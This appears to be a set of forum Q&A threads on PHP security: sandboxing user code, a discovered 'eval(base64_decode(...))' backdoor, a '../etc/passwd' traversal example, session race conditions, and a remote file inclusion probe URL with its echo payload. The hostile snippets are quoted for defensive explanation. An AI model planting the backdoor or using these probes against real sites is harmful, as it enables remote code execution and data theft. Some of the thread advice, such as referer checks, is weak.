I've been thinking for a while about the idea of allowing user to inject code on website and run it on a web server. It's not a new idea - many websites allow users to "test" their code online - such as http://ideone.com/.
For example: Let's say that we have a form containing <textarea> element in which that user enters his piece of code and then submits it. Server reads POST data, saves as PHP file and require()s it while being surrounded by ob_*() output buffering handlers. Captured output is presented to end user.
My question is: how to do it properly? Things that we should take into account [and possible solutions]:
security, user is not allowed to do anything evil,
php.ini's disable_functions
stability, user is not allowed to kill webserver submitting while(true){},
set_time_limit()
performance, server returns answer in an acceptable time,
control, user can do anything that matches previous points.
I would prefer PHP-oriented answers, but general approach is also welcome. Thank you in advance.
I would think about this problem one level higher, above and outside of the web server. Have a very unprivileged, jailed, chroot'ed standalone process for running these uploaded PHP scripts, then it doesn't matter what PHP functions are enabled or not, they will fail based on permissions and lack of access.
Have a parent process that monitors how long the above mentioned "worker" process has been running, if its been too long, kill it, and report back a timeout error to the end user.
Obviously there are many implementation details to work out as to how to run this system asynchronously outside of the browser request, but I think it would provide a pretty secure way to run your untrusted PHP scripts.
Wouldn't disabling functions in your server's ini file limit some of the functions of the application itself?
I think you have to do some hardcore sanitization on the POST data and strip "illegal" code there. I think doing that with the addition of the other methods you describe might make it work.
Just remember. Sanitize the everloving daylight out of that POST data.
Related
I need to understand the below code
eval(base64_decode($_REQUEST['comment']));
It utilized the CPU , the page only contain this code
That could literally run anything, so there's no way of knowing. It takes the input from $_REQUEST['comment'], base64 decodes it, then runs it as PHP code.
For example, if cGhwaW5mbygpOw== was passed, it would execute phpinfo();.
On a side note, those sorts of code snippets are usually a red flag and are commonly used as back-doors.
This code base64_decodes some input, and then evaluates it as PHP code. What ultimately ends up being executed depends on the contents of the comment field.
I am guessing that you found this inserted into the code on your page, and it means that your site was in some way compromised. It means that literally anyone can write any PHP code to do anything, base64_encode() it, and post it to your site in the 'comment' field, and the server will execute it.
When you actually notice that it's using a lot of resources then it is probably being used to send spam or DOS someone, but as long as that code is there it's probably being used to compromise your server.
Basically, if you ever find something that starts with eval(base64_decode(... it will be doing bad things.
Source: 5 years as a sysadmin for a web hosting company.
This will be a newbie question but I'm learning php for one sole purpose (atm) to implement a solution--everything i've learned about php was learned in the last 18 hours.
The goal is adding indirection to my javascript get requests to allow for cross-domain accesses of another website. I also don't wish to throttle said website and want to put safeguards in place. I can't rely on them being in javascript because that can't account for other peers sending their requests.
So right now I have the following makeshift code, without any throttling measures:
<?php
$expires = 15;
if(!$_GET["target"])
exit();
$fn = md5($_GET["target"]);
if(!$_GET["cache"]) {
if(!array_search($fn, scandir("cache/")) ||
time() - filemtime($file) > $expires)
echo file_get_contents("cache/".$fn);
else
echo file_get_contents(file);
}
else if($_GET["data"]) {
file_put_contents("cache/".$fn, $_GET["data"]);
}
?>
It works perfectly, as far as I can tell (doesn't account for the improbable checksum clash). Now what I want to know is, and what my search queries in google refuse to procure for me, is how php actually launches and when it ends.
Obviously if I was running my own web server I'd have a bit more insight into this: I'm not, I have no shell access either.
Basically I'm trying to figure out whether I can control for when the script ends in the code, and whether every 'get' request to the php file would launch a new instance of the script or whether it can 'wake up' the same script. The reason being I wish to track whether, say, it already sent a request to 'target' within the last n milliseconds, and it seems a bit wasteful to dump the value to a savefile and then recover it, over and over, for something that doesn't need to be kept in memory for very long.
Every HTTP request starts a new instance of the interpreter; it's basically an implementation detail whether this is a whole new process, or a reuse of an existing one.
This generally pushes you towards good simple and scalable designs: you can run multiple server processes and threads and you won't get varying behaviour depending whether the request goes back to the same instance or not.
Loading a recently-touched file will be very fast on Linux, since it will come right from the cache. Don't worry about it.
Do worry about the fact that by directly appending request parameters to the path you have a serious security hole: people can get data=../../../etc/passwd and so on. Read http://www.php.net/manual/en/security.variables.php and so on. (In this particular example you're hashing the inputs before putting them in the path so it's not a practical problem but it is something to watch for.)
More generally, if you want to hold a cache across multiple requests the typical thing these days is to use memcached.
php is done from a per-connection basis. IE: each request for a php file is seen as a new instance. Each instance is ended, generally, when the connection is closed. You can however use sessions to save data between connections for a specific user
For basic use of sessions look into:
session_start()
$_SESSION
session_destroy()
On my website, I have a search.php page that makes $.get requests to pages like search_data.php and search_user_data.php etc.
The problem is all of these files are located within my public html folder.
Even though someone could browse to www.mysite.com/search_user_data.php, all of the data processed is properly escaped and handled, but on a professional level this is inadequate to even have this file within public reach.
I have tried moving the sensitive files to my web root, however since Jquery is making $.get requests and passing variables in the URL, this doesn't work.
Does anyone know any methods to firmly secure these vulnerable pages?
What you describe is normal.
You have PHP files that are reachable in your www directory so apache (or your favored webserver) can read and process them.
If you move them out you can't reach them anymore so there is no real option of that sort.
After all your PHP files for AJAX are just regular php files, likely your other project also contains php files. Right ? They are not more or less at risk than any script on your server.
Make sure you program "clean". Think about evil requests when writing your php functions, not after writing them.
As you already did: correctly quote all incoming input that might hit a database or sensitive function.
You can add security checks on your incoming values and create an automated email if you detect someone trying evil stuff. So you'll likely receive a warning in such cases.
But on the downside: You'll regularly receive warnings because some companies automatically scan websites for possible bugs. So you will receive a warning on such scans as well.
On top of writing your code as "secure" as you can, you may want to add a referer check in your code. That means your PHP file will only react if your website was given as referer when accessing it. That's enough to block 80% of the kids out there.
But on the downside: a few internet users do not send a referer at all, some proxies filter that. (I personally would ignore them, half the (www) internet breaks on them anyway)
One more layer of protection can be added by htaccess, you can do most within PHP but it might still be of interest for you: http://httpd.apache.org/docs/2.0/howto/htaccess.html
You can store a uid each time your page is loaded and store it in $_SESSION['uid']. You give this uid to javascript by doing :
var uid = <?php print $_SESSION['uid']; ?>;
Then you pass it with your get request, compare it to your $_SESSION :
if($_GET['uid'] != $_SESSION['uid']) // Stop with an error message or send a forbidden header.
If it's ok, do what you need.
It's not perfect since someone can request search.php and get the current uid, and then request the other pages, but it may be the best possible solution.
I need to use mutexes or semaphores in PHP, and it scares me. To clarify, I'm not scared of writing deadlock-free code that synchronizes properly or afraid of the perils of concurrent programming, but of how well PHP handles fringe cases.
Quick background: writing a credit card handler interface that sits between the users and the 3rd party credit card gateway. Need to prevent duplicate requests, and already have a system in place that works, but if the user hits submit (w/out JS enabled so I can't disable the button for them) milliseconds apart, a race condition ensues where my PHP script does not realize that a duplicate request has been made. Need a semaphore/mutex so I can ensure only one successful request goes through for each unique transaction.
I'm running PHP behind nginx via PHP-FPM with multiple processes on a multi-core Linux machine. I want to be sure that
semaphores are shared between all php-fpm processes and across all cores (i686 kernel).
php-fpm handles a PHP process crash while holding a mutex/semaphore and releases it accordingly.
php-fpm handles a session abort while holding a mutex/semaphore and releases it accordingly.
Yes, I know. Very basic questions, and it would be foolish to think that a proper solution doesn't exist for any other piece of software. But this is PHP, and it was most certainly not built with concurrency in mind, it crashes often (depending on which extensions you have loaded), and is in a volatile environment (PHP-FPM and on the web).
With regards to (1), I'm assuming if PHP is using the POSIX functions that both these conditions hold true on a SMP i686 machine. As for (2), I see from briefly skimming the docs that there is a parameter that decides this behavior (though why would one ever want PHP to NOT release a mutex is the session is killed I don't understand). But (3) is my main concern and I don't know if it's safe to assume that php-fpm properly handles all fringe cases for me. I (obviously) don't ever want a deadlock, but I'm not sure I can trust PHP to never leave my code in a state where it cannot obtain a mutex because the session that grabbed it was either gracefully or ungracefully terminated.
I have considered using a MySQL LOCK TABLES approach, but there's even more doubt there because while I trust the MySQL lock more than the PHP lock, I fear if PHP aborts a request (with*out* crashing) while holding the MySQL session lock, MySQL might keep the table locked (esp. because I can easily envision the code that would cause this to take place).
Honestly, I'd be most comfortable with a very basic C extension where I can see exactly what POSIX calls are being made and with what params to ensure the exact behavior I want.. but I don't look forward to writing that code.
Anyone have any concurrency-related best practices regarding PHP they'd like to share?
In fact, i think there is no need for a complex mutex / semaphore whatever solution.
Form keys stored in a PHP $_SESSION are all you need. As a nice side effect, this method also protects your form against CSRF attacks.
In PHP, sessions are locked by aquiring a POSIX flock() and PHP's session_start() waits until the user session is released. You just have to unset() the form key on the first valid request. The second request has to wait until the first one releases the session.
However, when running in a (not session or source ip based) load balancing scenario involving multiple hosts things are getting more complicated. For such a scenario, i'm sure you will find a valuable solution in this great paper: http://thwartedefforts.org/2006/11/11/race-conditions-with-ajax-and-php-sessions/
I reproduced your use case with the following demonstration. just throw this file onto your webserver and test it:
<?php
session_start();
if (isset($_REQUEST['do_stuff'])) {
// do stuff
if ($_REQUEST['uniquehash'] == $_SESSION['uniquehash']) {
echo "valid, doing stuff now ... "; flush();
// delete formkey from session
unset($_SESSION['uniquehash']);
// release session early - after committing the session data is read-only
session_write_close();
sleep(20);
echo "stuff done!";
}
else {
echo "nope, {$_REQUEST['uniquehash']} is invalid.";
}
}
else {
// show form with formkey
$_SESSION['uniquehash'] = md5("foo".microtime().rand(1,999999));
?>
<html>
<head><title>session race condition example</title></head>
<body>
<form method="POST">
<input type="hidden" name="PHPSESSID" value="<?=session_id()?>">
<input type="text" name="uniquehash"
value="<?= $_SESSION['uniquehash'] ?>">
<input type="submit" name="do_stuff" value="Do stuff!">
</form>
</body>
</html>
<?php } ?>
An interesting question you have but you don't have any data or code to show.
For 80% of cases the chances of anything nasty happening because of PHP itself are virtually zero if you follow the standard procedures and practices regarding stopping users from submitting forms multiple times, which applies to nearly every other setup, not just PHP.
If you're the 20% and your environment demands it, then one option is using message queues which I'm sure you are familiar with. Again, this idea is language agnostic. Nothing to do with languages. Its all about how data moves around.
you can store a random hash in an array within your session data as well as print that hash as a hidden form input value. when a request comes in, if the hidden hash value exists in your session array, you can delete the hash from the session and process the form, otherwise don't.
this should prevent duplicate form submits as well as help prevent csrf attacks.
If the problem only arises when hitting a button milliseconds apart, wouldn't a software debouncer work? Like saving the time of a button press in a session variable and not allowing any more for, say, a second? Just a before-my-morning-coffee idea. Cheers.
What I do in order to prevent session race condition in the code is after the last operation that stores data in session I use PHP function session_write_close() notice that if you are using PHP 7 you need to disable default output buffering in php.ini. If you have time consuming operations it'd be better to execute them after session_write_close() is invoked.
I hope it'll help someone, for me it saved my life :)
A guy called ShiroHige is trying to hacking my website.
He tries to open a page with this parameter:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
If you look at that text file it is just a die(),
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
So what exploit is he trying to use (WordPress?)?
Edit 1:
I know he is trying use RFI.
Is there some popular script that are exploitable with that (Drupal, phpBB, etc.)?
An obvious one, just unsanitized include.
He is checking if the code gets executed.
If he finds his signature in a response, he will know that your site is ready to run whatever code he sends.
To prevent such attacks one have to strictly sanitize filenames, if they happen to be sent via HTTP requests.
A quick and cheap validation can be done using basename() function:
if (empty($_GET['page']))
$_GET['page']="index.php";
$page = $modules_dir.basename($_GET['page']).".php";
if (!is_readable($page)) {
header("HTTP/1.0 404 Not Found");
$page="404.html";
}
include $page;
or using some regular expression.
There is also an extremely useful PHP configuration directive called
allow_url_include
which is set to off by default in modern PHP versions. So it protects you from such attacks automatically.
The vulnerability the attacker is aiming for is probably some kind of remote file inclusion exploiting PHP’s include and similar functions/construct that allow to load a (remote) file and execute its contents:
Security warning
Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.
Note that using readfile does only avoids that the loaded file is executed. But it is still possible to exploit it to load other contents that are then printed directly to the user. This can be used to print the plain contents of files of any type in the local file system (i.e. Path Traversal) or to inject code into the page (i.e. Code Injection). So the only protection is to validate the parameter value before using it.
See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.
It looks like the attack is designed to print out "ShiroHige" on vulnerable sites.
The idea being, that is you use include, but do not sanitize your input, then the php in this text file is executed. If this works, then he can send any php code to your site and execute it.
A list of similar files can be found here. http://tools.sucuri.net/?page=tools&title=blacklist&detail=072904895d17e2c6c55c4783df7cb4db
He's trying to get your site to run his file. This would probably be an XSS attack? Not quite familiar with the terms (Edit: RFI - Remote file inclusion).
Odds are he doesn't know what he's doing. If there’s a way to get into WordPress, it would be very public by now.
I think its only a first test if your site is vulnerable to external includes. If the echo is printed, he knows its possible to inject code.
You're not giving much detail on the situation and leaving a lot to the imagination.
My guess is that he's trying to exploit allow_url_fopen. And right now he's just testing code to see what he can do. This is the first wave!
I think it is just a malicious URL. As soon as i entered it into my browser, Avast antivirus claimed it to be a malicious url. So that php code may be deceiving or he may just be testing. Other possibility is that the hacker has no bad intentions and just want to show that he could get over your security.